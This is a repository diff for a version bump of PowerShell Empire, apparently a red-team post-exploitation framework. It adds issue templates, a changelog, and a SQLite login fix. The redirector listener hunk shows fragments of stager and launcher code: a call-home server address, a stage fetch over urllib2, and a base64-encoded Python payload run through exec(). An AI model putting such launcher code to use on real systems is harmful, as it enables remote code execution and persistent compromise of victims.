Codebase list powershell-empire / e2905aa
New upstream version 3.1.2 Sophie Brun 4 years ago
9 changed file(s) with 99 addition(s) and 7 deletion(s). Raw diff Collapse all Expand all
+3
-0
.github/FUNDING.yml less more
0 # These are supported funding model platforms
1
2 github: [bc-security]
+34
-0
.github/ISSUE_TEMPLATE/bug_report.md less more
0 ---
1 name: Bug report
2 about: Create a report to help us improve
3 title: "[BUG]"
4 labels: bug
5 assignees: ''
6
7 ---
8
9 **Empire Version**
10 - Empire 3.x
11
12 **OS Information (Linux flavor, Python version)**
13 - OS:
14 - Python:
15
16 **Describe the bug**
17 A clear and concise description of what the bug is.
18
19 **To Reproduce**
20 Steps to reproduce the behavior:
21 1. Go to '...'
22 2. Click on '....'
23 3. Scroll down to '....'
24 4. See error
25
26 **Expected behavior**
27 A clear and concise description of what you expected to happen.
28
29 **Screenshots**
30 If applicable, add screenshots to help explain your problem.
31
32 **Additional context**
33 Add any other context about the problem here.
+20
-0
.github/ISSUE_TEMPLATE/feature_request.md less more
0 ---
1 name: Feature request
2 about: Suggest an idea for this project
3 title: "[FEATURE REQUEST]"
4 labels: enhancement
5 assignees: ''
6
7 ---
8
9 **Is your feature request related to a problem? Please describe.**
10 A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
11
12 **Describe the solution you'd like**
13 A clear and concise description of what you want to happen.
14
15 **Describe alternatives you've considered**
16 A clear and concise description of any alternative solutions or features you've considered.
17
18 **Additional context**
19 Add any other context or screenshots about the feature request here.
+28
-0
.github/issue-close-app.yml less more
0 # Comment that will be sent if an issue is judged to be closed
1 comment: "This issue is closed because it does not meet our issue template. Please resubmit with the correct template."
2 issueConfigs:
3 # There can be several configs for different kind of issues.
4 - content:
5 # Example 1: bug report
6 - "Empire Version"
7 - "OS Information (Linux flavor, Python version)"
8 - "Describe the bug"
9 - "To Reproduce"
10 - "Expected behavior"
11 - "Screenshots"
12 - "Additional context"
13
14 - content:
15 # Example 2: feature request
16 - "Is your feature request related to a problem? Please describe."
17 - "Describe the solution you'd like"
18 - "Describe alternatives you've considered"
19 - "Additional context"
20
21 - content:
22 # Example 3: fall back
23 - "Empire Version"
24 - "OS Information (Linux flavor, Python version)"
25 - "Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better."
26 - "Screenshot of error, embedded text output, or Pastebin link to the error"
27 - "Any additional information"
+1
-1
VERSION less more
0 3.1.1
0 3.1.2
+7
-0
changelog less more
0 3/13/2020
1 ------------
2 - Version 3.1.2 Master Release
3 - Fixed REST login error 500 on some version of SQLite - #120 (@justsly)
4 - Fixed generate launcher bug for redirector listener - #125 (@RedBulletTooling)
5
06 3/8/2020
7 ------------
18 - Version 3.1.1 Master Release
29 - Updated the /me endpoint that was added in 3.1.0 to return the full user object (@Vinnybod)
310 - Updated install script for Kali Powershell install - #118 (@Vinnybod)
+1
-1
lib/common/empire.py less more
1414 from builtins import str
1515 from builtins import range
1616
17 VERSION = "3.1.1 BC-Security Fork"
17 VERSION = "3.1.2 BC-Security Fork"
1818
1919 from pydispatch import dispatcher
2020
+1
-1
lib/common/users.py less more
107107 try:
108108 self.lock.acquire()
109109 cur = conn.cursor()
110 user = cur.execute("SELECT password from users WHERE username = ? AND enabled = true LIMIT 1", (user_name,)).fetchone()
110 user = cur.execute("SELECT password from users WHERE username = ? AND enabled = 1 LIMIT 1", (user_name,)).fetchone()
111111
112112 if user == None:
113113 return None
+4
-4
lib/listeners/redirector.py less more
194194
195195 # prebuild the request routing packet for the launcher
196196 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
197 b64RoutingPacket = base64.b64encode(routingPacket)
197 b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8")
198198
199199 #stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
200 stager += "$ser='%s';$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName)
200 stager += "$ser=%s;$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName)
201201
202202 #Add custom headers if any
203203 if customHeaders != []:
263263
264264 # prebuild the request routing packet for the launcher
265265 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
266 b64RoutingPacket = base64.b64encode(routingPacket)
266 b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8")
267267
268268 launcherBase += "req=urllib2.Request(server+t);\n"
269269 # add the RC4 packet to a cookie
324324 launcherBase += "exec(''.join(out))"
325325
326326 if encode:
327 launchEncoded = base64.b64encode(launcherBase)
327 launchEncoded = base64.b64encode(launcherBase).decode("utf-8")
328328 launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
329329 return launcher
330330 else: